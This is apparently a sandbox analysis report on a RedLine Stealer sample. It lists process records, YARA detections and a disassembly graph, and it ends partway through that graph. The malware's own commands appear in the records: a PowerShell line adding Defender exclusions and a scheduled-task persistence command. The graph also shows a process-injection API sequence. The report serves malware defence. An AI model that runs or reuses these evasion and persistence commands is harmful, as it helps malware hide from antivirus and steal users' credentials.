                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:22:11:59
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Imagebase:0x8b0000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Imagebase:0x3a0000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Imagebase:0x3a0000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:22:12:05
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"
                    Imagebase:0x550000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:22:12:06
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:22:12:06
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Imagebase:0xce0000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:9
                    Start time:22:12:06
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:10
                    Start time:22:12:07
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Imagebase:0xcb0000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 83%, ReversingLabs
                    • Detection: 43%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:11
                    Start time:22:12:08
                    Start date:26/07/2024
                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Imagebase:0x7ff6ef0c0000
                    File size:496'640 bytes
                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:12
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Imagebase:0x550000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:13
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:14
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Imagebase:0x910000
                    File size:563'720 bytes
                    MD5 hash:304EA6D5CF3786D19DE14F004D7D057A
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:15
                    Start time:22:12:15
                    Start date:26/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:11.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:3.1%
                      Total number of Nodes:320
                      Total number of Limit Nodes:16
                      execution_graph 34029 1323e22 34030 1323f2c 34029->34030 34031 132413a 34030->34031 34035 1326ee0 34030->34035 34052 1326f46 34030->34052 34070 1326ed0 34030->34070 34036 1326ee1 34035->34036 34037 1326f02 34036->34037 34087 1327806 34036->34087 34092 132757d 34036->34092 34097 132763c 34036->34097 34102 132753c 34036->34102 34109 132731f 34036->34109 34113 13272d9 34036->34113 34118 13276bb 34036->34118 34123 13272f5 34036->34123 34128 1327756 34036->34128 34133 13278b1 34036->34133 34139 13273d2 34036->34139 34144 13274cd 34036->34144 34149 132740a 34036->34149 34154 1327a04 34036->34154 34037->34031 34053 1326ed4 34052->34053 34054 1326f49 34052->34054 34055 13273d2 2 API calls 34053->34055 34056 1326f02 34053->34056 34057 13278b1 2 API calls 34053->34057 34058 1327756 2 API calls 34053->34058 34059 13272f5 2 API calls 34053->34059 34060 13276bb 2 API calls 34053->34060 34061 13272d9 2 API calls 34053->34061 34062 132731f 2 API calls 34053->34062 34063 132753c 4 API calls 34053->34063 34064 132763c 2 API calls 34053->34064 34065 132757d 2 API calls 34053->34065 34066 1327806 2 API calls 34053->34066 34067 1327a04 2 API calls 34053->34067 34068 132740a 2 API calls 34053->34068 34069 13274cd 2 API calls 34053->34069 34054->34031 34055->34056 34056->34031 34057->34056 34058->34056 34059->34056 34060->34056 34061->34056 34062->34056 34063->34056 34064->34056 34065->34056 34066->34056 34067->34056 34068->34056 34069->34056 34071 1326ed4 34070->34071 34072 13273d2 2 API calls 34071->34072 34073 13278b1 2 API calls 34071->34073 34074 1327756 2 API calls 34071->34074 34075 13272f5 2 API calls 34071->34075 34076 13276bb 2 API calls 34071->34076 34077 13272d9 2 API calls 34071->34077 34078 132731f 2 API calls 34071->34078 34079 132753c 4 API calls 34071->34079 34080 132763c 2 API calls 34071->34080 34081 132757d 2 API calls 34071->34081 34082 1326f02 34071->34082 34083 1327806 2 API calls 34071->34083 34084 1327a04 2 API calls 34071->34084 34085 132740a 2 API calls 34071->34085 34086 13274cd 2 API calls 34071->34086 34072->34082 34073->34082 34074->34082 34075->34082 34076->34082 34077->34082 34078->34082 34079->34082 34080->34082 34081->34082 34082->34031 34083->34082 34084->34082 34085->34082 34086->34082 34088 132780c 34087->34088 34159 1323510 34088->34159 34163 1323508 34088->34163 34089 1327cd3 34089->34089 34093 1327a68 34092->34093 34167 1323698 34093->34167 34171 1323691 34093->34171 34094 1327a86 34098 1327641 34097->34098 34100 1323510 ResumeThread 34098->34100 34101 1323508 ResumeThread 34098->34101 34099 1327cd3 34100->34099 34101->34099 34176 13235c0 34102->34176 34180 13235b9 34102->34180 34103 13273f0 34103->34037 34105 1323510 ResumeThread 34103->34105 34106 1323508 ResumeThread 34103->34106 34104 1327cd3 34105->34104 34106->34104 34184 13239d4 34109->34184 34188 13239e0 34109->34188 34114 1327323 34113->34114 34115 1327356 34114->34115 34116 13239e0 CreateProcessA 34114->34116 34117 13239d4 CreateProcessA 34114->34117 34115->34037 34116->34115 34117->34115 34119 13276d3 34118->34119 34192 1323750 34119->34192 34196 1323758 34119->34196 34120 13276f4 34124 13272e8 34123->34124 34125 1327356 34124->34125 34126 13239e0 CreateProcessA 34124->34126 34127 13239d4 CreateProcessA 34124->34127 34125->34037 34126->34125 34127->34125 34129 1327c66 34128->34129 34200 1323841 34129->34200 34204 1323848 34129->34204 34130 1327c88 34130->34037 34134 13276d3 34133->34134 34135 13278be 34133->34135 34137 1323750 WriteProcessMemory 34134->34137 34138 1323758 WriteProcessMemory 34134->34138 34136 13276f4 34137->34136 34138->34136 34140 13273d8 34139->34140 34142 1323510 ResumeThread 34140->34142 34143 1323508 ResumeThread 34140->34143 34141 1327cd3 34142->34141 34143->34141 34145 13274f0 34144->34145 34147 1323750 WriteProcessMemory 34145->34147 34148 1323758 WriteProcessMemory 34145->34148 34146 1327906 34147->34146 34148->34146 34150 1327416 34149->34150 34151 1327381 34150->34151 34152 13235c0 Wow64SetThreadContext 34150->34152 34153 13235b9 Wow64SetThreadContext 34150->34153 34151->34037 34152->34150 34153->34150 34155 1327a0d 34154->34155 34157 1323750 WriteProcessMemory 34155->34157 34158 1323758 WriteProcessMemory 34155->34158 34156 1327c34 34157->34156 34158->34156 34160 1323550 ResumeThread 34159->34160 34162 1323581 34160->34162 34162->34089 34164 1323550 ResumeThread 34163->34164 34166 1323581 34164->34166 34166->34089 34168 1323699 VirtualAllocEx 34167->34168 34170 1323715 34168->34170 34170->34094 34173 1323694 34171->34173 34172 132364c 34172->34094 34173->34172 34174 13236e2 VirtualAllocEx 34173->34174 34175 1323715 34174->34175 34175->34094 34177 13235c1 Wow64SetThreadContext 34176->34177 34179 132364d 34177->34179 34179->34103 34181 13235bc Wow64SetThreadContext 34180->34181 34183 132364d 34181->34183 34183->34103 34185 13239d8 CreateProcessA 34184->34185 34187 1323c2b 34185->34187 34189 1323a69 34188->34189 34189->34189 34190 1323bce CreateProcessA 34189->34190 34191 1323c2b 34190->34191 34193 1323754 WriteProcessMemory 34192->34193 34195 13237f7 34193->34195 34195->34120 34197 1323759 WriteProcessMemory 34196->34197 34199 13237f7 34197->34199 34199->34120 34201 1323844 ReadProcessMemory 34200->34201 34203 13238d7 34201->34203 34203->34130 34205 1323849 ReadProcessMemory 34204->34205 34207 13238d7 34205->34207 34207->34130 34326 efd01c 34327 efd034 34326->34327 34328 efd08e 34327->34328 34333 2d81e98 34327->34333 34337 2d80abc 34327->34337 34346 2d82c08 34327->34346 34355 2d81ea8 34327->34355 34334 2d81ece 34333->34334 34335 2d80abc CallWindowProcW 34334->34335 34336 2d81eef 34335->34336 34336->34328 34340 2d80ac7 34337->34340 34338 2d82c79 34375 2d80be4 34338->34375 34340->34338 34341 2d82c69 34340->34341 34359 2d82e6c 34341->34359 34365 2d82d91 34341->34365 34370 2d82da0 34341->34370 34342 2d82c77 34348 2d82c45 34346->34348 34347 2d82c79 34349 2d80be4 CallWindowProcW 34347->34349 34348->34347 34350 2d82c69 34348->34350 34351 2d82c77 34349->34351 34352 2d82e6c CallWindowProcW 34350->34352 34353 2d82da0 CallWindowProcW 34350->34353 34354 2d82d91 CallWindowProcW 34350->34354 34352->34351 34353->34351 34354->34351 34356 2d81ece 34355->34356 34357 2d80abc CallWindowProcW 34356->34357 34358 2d81eef 34357->34358 34358->34328 34360 2d82e2a 34359->34360 34361 2d82e7a 34359->34361 34379 2d82e58 34360->34379 34382 2d82e47 34360->34382 34362 2d82e40 34362->34342 34366 2d82db4 34365->34366 34368 2d82e58 CallWindowProcW 34366->34368 34369 2d82e47 CallWindowProcW 34366->34369 34367 2d82e40 34367->34342 34368->34367 34369->34367 34372 2d82db4 34370->34372 34371 2d82e40 34371->34342 34373 2d82e58 CallWindowProcW 34372->34373 34374 2d82e47 CallWindowProcW 34372->34374 34373->34371 34374->34371 34376 2d80bef 34375->34376 34377 2d8435a CallWindowProcW 34376->34377 34378 2d84309 34376->34378 34377->34378 34378->34342 34380 2d82e69 34379->34380 34385 2d84280 34379->34385 34380->34362 34383 2d82e69 34382->34383 34384 2d84280 CallWindowProcW 34382->34384 34383->34362 34384->34383 34386 2d80be4 CallWindowProcW 34385->34386 34387 2d842aa 34386->34387 34387->34380 34388 137d300 34389 137d346 GetCurrentProcess 34388->34389 34391 137d391 34389->34391 34392 137d398 GetCurrentThread 34389->34392 34391->34392 34393 137d3d5 GetCurrentProcess 34392->34393 34395 137d3ce 34392->34395 34394 137d40b 34393->34394 34396 137d433 GetCurrentThreadId 34394->34396 34395->34393 34397 137d464 34396->34397 34322 2d81cf0 34323 2d81d58 CreateWindowExW 34322->34323 34325 2d81e14 34323->34325 34325->34325 34398 2d87020 34399 2d8704d 34398->34399 34410 2d86868 34399->34410 34401 2d87103 34414 2d86888 34401->34414 34403 2d86888 3 API calls 34404 2d87559 34403->34404 34405 2d86868 3 API calls 34404->34405 34406 2d8758b 34405->34406 34407 2d86868 3 API calls 34406->34407 34409 2d875bd 34407->34409 34408 2d87167 34408->34403 34411 2d8686e 34410->34411 34419 2d86d2c 34411->34419 34413 2d88417 34413->34401 34415 2d86893 34414->34415 34417 13785c8 3 API calls 34415->34417 34418 1375dd8 3 API calls 34415->34418 34416 2d88bbb 34416->34408 34417->34416 34418->34416 34420 2d86d37 34419->34420 34423 1375dd8 3 API calls 34420->34423 34424 13785c8 34420->34424 34421 2d8849c 34421->34413 34423->34421 34425 13785d8 34424->34425 34427 137888b 34425->34427 34429 137af40 3 API calls 34425->34429 34426 13788c9 34426->34421 34427->34426 34428 137d029 3 API calls 34427->34428 34428->34426 34429->34427 34208 13280e8 34211 13280e9 34208->34211 34209 1328273 34211->34209 34212 13252ac 34211->34212 34213 1328368 PostMessageW 34212->34213 34214 13283d4 34213->34214 34214->34211 34215 1374668 34216 137467a 34215->34216 34217 1374686 34216->34217 34221 1374779 34216->34221 34226 1373e28 34217->34226 34219 13746a5 34222 137479d 34221->34222 34230 1374878 34222->34230 34234 1374888 34222->34234 34227 1373e33 34226->34227 34242 1375d58 34227->34242 34229 137709e 34229->34219 34232 13748af 34230->34232 34231 137498c 34231->34231 34232->34231 34238 13744b0 34232->34238 34236 13748af 34234->34236 34235 137498c 34236->34235 34237 13744b0 CreateActCtxA 34236->34237 34237->34235 34239 1375918 CreateActCtxA 34238->34239 34241 13759db 34239->34241 34241->34241 34243 1375d63 34242->34243 34246 1375d78 34243->34246 34245 1377145 34245->34229 34247 1375d83 34246->34247 34250 1375da8 34247->34250 34249 1377222 34249->34245 34251 1375db3 34250->34251 34254 1375dd8 34251->34254 34253 1377325 34253->34249 34255 1375de3 34254->34255 34257 137888b 34255->34257 34260 137af40 34255->34260 34256 13788c9 34256->34253 34257->34256 34264 137d029 34257->34264 34269 137af67 34260->34269 34274 137af78 34260->34274 34261 137af56 34261->34257 34265 137d059 34264->34265 34266 137d07d 34265->34266 34306 137d1d7 34265->34306 34310 137d1e8 34265->34310 34266->34256 34270 137af78 34269->34270 34278 137b061 34270->34278 34286 137b070 34270->34286 34271 137af87 34271->34261 34276 137b061 2 API calls 34274->34276 34277 137b070 2 API calls 34274->34277 34275 137af87 34275->34261 34276->34275 34277->34275 34279 137b081 34278->34279 34280 137b0a4 34278->34280 34279->34280 34294 137b2f9 34279->34294 34298 137b308 34279->34298 34280->34271 34281 137b09c 34281->34280 34282 137b2a8 GetModuleHandleW 34281->34282 34283 137b2d5 34282->34283 34283->34271 34287 137b081 34286->34287 34288 137b0a4 34286->34288 34287->34288 34292 137b2f9 LoadLibraryExW 34287->34292 34293 137b308 LoadLibraryExW 34287->34293 34288->34271 34289 137b09c 34289->34288 34290 137b2a8 GetModuleHandleW 34289->34290 34291 137b2d5 34290->34291 34291->34271 34292->34289 34293->34289 34295 137b31c 34294->34295 34297 137b341 34295->34297 34302 137aa88 34295->34302 34297->34281 34299 137b31c 34298->34299 34300 137b341 34299->34300 34301 137aa88 LoadLibraryExW 34299->34301 34300->34281 34301->34300 34303 137b4e8 LoadLibraryExW 34302->34303 34305 137b561 34303->34305 34305->34297 34307 137d1e8 34306->34307 34309 137d22f 34307->34309 34314 137cd48 34307->34314 34309->34266 34312 137d1f5 34310->34312 34311 137d22f 34311->34266 34312->34311 34313 137cd48 3 API calls 34312->34313 34313->34311 34315 137cd53 34314->34315 34317 137db40 34315->34317 34318 137ce74 34315->34318 34319 137ce7f 34318->34319 34320 1375dd8 3 API calls 34319->34320 34321 137dbaf 34320->34321 34321->34317 34430 137d548 DuplicateHandle 34431 137d5de 34430->34431

                      Executed Functions

                      Function 02D8F350 Relevance: 9.1, Strings: 7, Instructions: 363COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 439 2d8f350-2d8f358 440 2d8f35a 439->440 441 2d8f336-2d8f34e 439->441 442 2d8f360-2d8f39b 440->442 441->439 443 2d8f3a6 442->443 444 2d8f3b0 443->444 584 2d8f3b2 call 2d8fae0 444->584 585 2d8f3b2 call 2d8fb10 444->585 586 2d8f3b2 call 2d8fb00 444->586 445 2d8f3b8-2d8f400 call 2d8effc 453 2d8f403 445->453 454 2d8f405-2d8f408 453->454 455 2d8f40a 454->455 456 2d8f411-2d8f417 454->456 455->456 457 2d8f4a8-2d8f4ae 455->457 458 2d8f45a-2d8f461 455->458 459 2d8f4ed-2d8f4ef 455->459 460 2d8f65d-2d8f66a 455->460 461 2d8f4ff-2d8f56f 455->461 462 2d8f601 455->462 463 2d8f5d1-2d8f5d5 455->463 464 2d8f472-2d8f474 455->464 465 2d8f672 455->465 466 2d8f636-2d8f645 455->466 467 2d8f587-2d8f596 455->467 468 2d8f419-2d8f41b 456->468 469 2d8f41d-2d8f429 456->469 477 2d8f4b0-2d8f4b2 457->477 478 2d8f4b4-2d8f4b6 457->478 471 2d8f571 458->471 472 2d8f467-2d8f470 458->472 459->453 479 2d8f4f5-2d8f4fa 459->479 460->465 492 2d8f576 461->492 487 2d8f62a-2d8f62d 462->487 475 2d8f5f8 463->475 476 2d8f5d7-2d8f5e0 463->476 473 2d8f492-2d8f499 464->473 474 2d8f476-2d8f480 464->474 493 2d8f67f-2d8f682 465->493 503 2d8f64e-2d8f655 466->503 504 2d8f647 466->504 498 2d8f598-2d8f5a2 467->498 499 2d8f5bc-2d8f5c6 467->499 470 2d8f42b-2d8f458 468->470 469->470 470->458 471->492 472->454 473->471 481 2d8f49f-2d8f4a6 473->481 474->471 482 2d8f486 474->482 486 2d8f5fb 475->486 484 2d8f5e2-2d8f5e5 476->484 485 2d8f5e7-2d8f5f4 476->485 483 2d8f4c0-2d8f4e4 477->483 478->483 479->454 481->457 500 2d8f48d 481->500 482->500 483->459 501 2d8f5f6 484->501 485->501 486->462 487->466 502 2d8f62f 487->502 496 2d8f57b-2d8f57e 492->496 494 2d8f694-2d8f698 493->494 495 2d8f684 493->495 509 2d8f69a-2d8f6a3 494->509 510 2d8f6bb 494->510 495->494 505 2d8f858-2d8f876 495->505 506 2d8f78b-2d8f78f 495->506 507 2d8f932 495->507 508 2d8f915-2d8f922 495->508 496->467 511 2d8f580 496->511 512 2d8f604-2d8f625 498->512 513 2d8f5a4-2d8f5b2 498->513 499->512 514 2d8f5c8-2d8f5cf 499->514 500->454 501->486 502->460 502->465 502->466 502->494 502->505 502->506 502->507 502->508 519 2d8f675-2d8f67a 503->519 520 2d8f657-2d8f65b 503->520 517 2d8f64c 504->517 555 2d8f87e-2d8f8de 505->555 527 2d8f791-2d8f79a 506->527 528 2d8f7b2 506->528 533 2d8f939-2d8f940 507->533 545 2d8f92a 508->545 521 2d8f6aa-2d8f6b7 509->521 522 2d8f6a5-2d8f6a8 509->522 526 2d8f6be-2d8f6c8 510->526 511->460 511->462 511->463 511->465 511->466 511->467 511->494 511->505 511->506 511->507 511->508 512->487 513->512 524 2d8f5b4-2d8f5b8 513->524 514->463 525 2d8f5ba 514->525 517->487 519->493 520->460 520->517 530 2d8f6b9 521->530 522->530 524->525 525->496 539 2d8f6d3-2d8f6da 526->539 536 2d8f79c-2d8f79f 527->536 537 2d8f7a1-2d8f7ae 527->537 532 2d8f7b5-2d8f81e 528->532 530->526 567 2d8f820-2d8f826 532->567 568 2d8f836-2d8f843 532->568 542 2d8f7b0 536->542 537->542 543 2d8f6dc-2d8f6e5 539->543 544 2d8f6fd 539->544 542->532 550 2d8f6ec-2d8f6f9 543->550 551 2d8f6e7-2d8f6ea 543->551 552 2d8f700-2d8f742 544->552 545->507 554 2d8f6fb 550->554 551->554 569 2d8f749-2d8f75b 552->569 554->552 581 2d8f8e8-2d8f8f6 555->581 570 2d8f828 567->570 571 2d8f82a-2d8f82c 567->571 568->519 572 2d8f849-2d8f853 568->572 574 2d8f764-2d8f766 569->574 570->568 571->568 572->493 575 2d8f768-2d8f76e 574->575 576 2d8f77e-2d8f786 574->576 578 2d8f770 575->578 579 2d8f772-2d8f774 575->579 576->493 578->576 579->576 582 2d8f8fc-2d8f910 581->582 582->493 584->445 585->445 586->445
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q
                      • API String ID: 0-564603710
                      • Opcode ID: 93cc1dcc9de79529b7883314000ec1b70c58cc405d55c272e0e508a1888a2e41
                      • Instruction ID: 77592b844a1b2495a7096defa46e50497e781f6767ad37dbf8206be96e1b8717
                      • Opcode Fuzzy Hash: 93cc1dcc9de79529b7883314000ec1b70c58cc405d55c272e0e508a1888a2e41
                      • Instruction Fuzzy Hash: 4BD1C070F40244DFEB14AF68D959BAD7BF2FB88700F608965E542AB794EB748C05CB90
                      Function 02D87020 Relevance: 2.5, Strings: 1, Instructions: 1236COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 773 2d87020-2d8704b 774 2d8704d 773->774 775 2d87052-2d871ee call 2d86868 call 2d86878 call 2d86888 773->775 774->775 796 2d8751f-2d87538 775->796 797 2d8753e-2d877d7 call 2d86888 call 2d86868 * 2 call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86c3c call 2d86c4c 796->797 798 2d871f3-2d871fa 796->798 865 2d877d9 797->865 866 2d877de-2d878ae call 2d86c5c 797->866 799 2d87221-2d87232 798->799 800 2d871fc-2d8721e 799->800 801 2d87234-2d87263 799->801 800->799 803 2d8726a-2d87278 801->803 804 2d87265 801->804 807 2d872a5-2d872b6 803->807 804->803 808 2d872b8-2d872d2 807->808 809 2d8727a-2d872a2 807->809 811 2d872f8-2d87309 808->811 809->807 812 2d8730b-2d87324 811->812 813 2d872d4-2d872f5 811->813 815 2d8732b-2d87339 812->815 816 2d87326 812->816 813->811 818 2d8735b-2d8736c 815->818 816->815 819 2d8733b-2d87358 818->819 820 2d8736e-2d87387 818->820 819->818 822 2d87389 820->822 823 2d8738e-2d873a7 820->823 822->823 824 2d873c7-2d873d8 823->824 826 2d873a9-2d873c4 824->826 827 2d873da-2d873f4 824->827 826->824 828 2d87416-2d8742d 827->828 831 2d8742f-2d87446 828->831 832 2d873f6-2d87413 828->832 834 2d87477-2d87491 831->834 832->828 835 2d87448-2d87471 834->835 836 2d87493-2d874a7 834->836 835->834 838 